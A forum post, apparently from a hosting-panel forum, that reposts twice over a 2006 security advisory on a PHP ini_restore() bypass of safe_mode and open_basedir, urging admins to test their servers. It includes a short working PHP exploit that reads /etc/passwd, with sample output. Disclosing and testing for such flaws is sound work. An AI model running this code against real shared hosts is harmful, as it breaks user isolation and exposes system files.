Not really a version update but this was the most relevent section so if this is in the wrong section feel free to move it.
If you rely on php safe mode try the code in the security advisory below and if it shows the contents of your /etc/passwd make sure you set safe mode to On in your php.ini rather than just using the directadmin switch or custom virtual_host.conf:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- - Written: 05.09.2006
- - Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 < = x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference Material is freely available.
php_admin_value name value
Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off
Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.
http://pl.php.net/manual/en/configuration.changes.php
- --- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.
httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.
For example:
open_basedir in httpd.conf
- ---
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
- ---
In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()
Example:
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore
Master Value to Local Value per ini_restore() function!
- ---
ini_restore
(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
- ---
Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.
EXPLOIT:
- ---
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
- ---
RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
- ---
This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.
- --- 2. How to fix ---
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, l5x
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Regards
SecurityReason
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a
SvP3KPhmLtZcCNFmtGa8oJ8=
=bqQV
-----END PGP SIGNATURE-----
If you rely on php safe mode try the code in the security advisory below and if it shows the contents of your /etc/passwd make sure you set safe mode to On in your php.ini rather than just using the directadmin switch or custom virtual_host.conf:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- - Written: 05.09.2006
- - Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 < = x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference Material is freely available.
php_admin_value name value
Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off
Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.
http://pl.php.net/manual/en/configuration.changes.php
- --- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.
httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.
For example:
open_basedir in httpd.conf
- ---
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
- ---
In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()
Example:
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore
Master Value to Local Value per ini_restore() function!
- ---
ini_restore
(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
- ---
Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.
EXPLOIT:
- ---
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
- ---
RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4
Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
- ---
This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.
- --- 2. How to fix ---
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, l5x
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Regards
SecurityReason
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a
SvP3KPhmLtZcCNFmtGa8oJ8=
=bqQV
-----END PGP SIGNATURE-----
Last edited: